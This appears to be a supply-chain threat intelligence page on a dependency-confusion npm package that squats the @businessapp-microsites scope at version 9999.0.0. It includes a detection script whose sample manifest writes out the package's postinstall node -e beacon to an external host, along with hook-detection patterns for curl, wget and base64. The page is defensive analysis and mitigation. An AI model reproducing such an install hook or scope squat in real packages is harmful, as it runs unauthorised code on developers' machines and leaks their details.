Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in @businessapp-microsites/apis (npm)

@businessapp-microsites/apis

Risk score

92

AI summary

Indexed incident for @businessapp-microsites/apis (npm).

Description

The package squats the @businessapp-microsites npm scope and is published at version 9999.0.0 (9999.0.1 is also listed as affected) so that it outranks any internal version during dependency resolution. Its package.json declares a postinstall script that runs node -e to issue an HTTPS GET to poc-trustpilot-npm-1782770591.testingboxes.com with a unique per-package token in the URL path. On any npm install that resolves this scope from the public registry, the installing machine makes an outbound callback that confirms code execution and discloses the installer's source IP and the fact that an install occurred to a third-party host. The combination of an unregistered-scope squat, the 9999.0.0 version pin, and an install-time beacon to an external host is the canonical dependency-confusion pattern; the researcher framing in the package metadata does not change the runtime behaviour on any machine that installs it.
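The three indicators named above (internal scope resolved from the public registry, an outranking version pin, and an install-time hook that phones home) can be checked mechanically against a package.json. The script below is an added example for this page, not ThreatPkg tooling; the internal scope list, the sample manifests and the `<per-package-token>` placeholder are constructed for the example, and the hook heuristics are a general version of the `node -e` plus HTTPS beacon described in this incident.

```javascript
// Added example (not ThreatPkg code): flag dependency-confusion indicators in
// a parsed package.json. Sample manifests below are constructed for illustration.

// Scopes the organisation publishes only to its private registry. In a real
// deployment read these from .npmrc (`@scope:registry=...`); assumed here.
const INTERNAL_SCOPES = new Set(["@businessapp-microsites"]);

// A major this high exists only to outrank any plausible internal version.
const OUTRANKING_MAJOR = 9000;

// Lifecycle hooks npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristics for install-time code that executes inline or reaches the network.
const HOOK_PATTERNS = [
  [/\bnode\s+-e\b/, "inline node -e"],
  [/https?:\/\//, "embedded URL"],
  [/\b(curl|wget)\b/, "curl/wget"],
  [/\b(?:base64|atob)\b/, "base64 payload"],
];

function scopeOf(name) {
  return name.startsWith("@") ? name.split("/")[0] : null;
}

function majorOf(version) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(version);
  return m ? Number(m[1]) : null;
}

// manifest: parsed package.json object. fromPublicRegistry: whether the
// install resolved it from registry.npmjs.org (in practice, the lockfile's
// "resolved" field). Returns a list of human-readable findings.
function dependencyConfusionIndicators(manifest, fromPublicRegistry) {
  const findings = [];
  const scope = scopeOf(manifest.name || "");
  if (scope && INTERNAL_SCOPES.has(scope) && fromPublicRegistry) {
    findings.push(`scope-squat: ${scope} resolved from the public registry`);
  }
  const major = majorOf(manifest.version || "");
  if (major !== null && major >= OUTRANKING_MAJOR) {
    findings.push(`outranking-version: ${manifest.version}`);
  }
  for (const hook of INSTALL_HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (!cmd) continue;
    const hits = HOOK_PATTERNS.filter(([re]) => re.test(cmd)).map(([, label]) => label);
    if (hits.length) findings.push(`install-hook: ${hook} (${hits.join(", ")})`);
  }
  return findings;
}

// Constructed sample mirroring the squatted package described above. The real
// per-package token is not reproduced; the path segment is a placeholder.
const SQUATTED = {
  name: "@businessapp-microsites/apis",
  version: "9999.0.0",
  scripts: {
    postinstall:
      "node -e \"require('https').get('https://poc-trustpilot-npm-1782770591.testingboxes.com/<per-package-token>')\"",
  },
};

// Constructed sample: the legitimate internal package from the private registry.
const INTERNAL = { name: "@businessapp-microsites/apis", version: "1.4.2", scripts: { build: "tsc" } };

// entries: [manifest, fromPublicRegistry] pairs. Returns one report per package.
function scan(entries) {
  return entries.map(([manifest, fromPublic]) => ({
    package: `${manifest.name}@${manifest.version}`,
    findings: dependencyConfusionIndicators(manifest, fromPublic),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of scan([[SQUATTED, true], [INTERNAL, false]])) {
    console.log(r.package, r.findings.length ? r.findings : "clean");
  }
}
```

The scan only tells you after the fact; the resolution-side fix is to bind the scope to the internal registry in .npmrc (`@businessapp-microsites:registry=https://registry.internal.example/`, registry URL assumed) so the public registry is never consulted for it, and to set `ignore-scripts=true` for CI installs so a postinstall beacon cannot run even if a squat slips through.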

Technical details

Affected versions

  • =9999.0.0
  • =9999.0.1

Indicators

  • affected version =9999.0.0 (75%)
  • affected version =9999.0.1 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
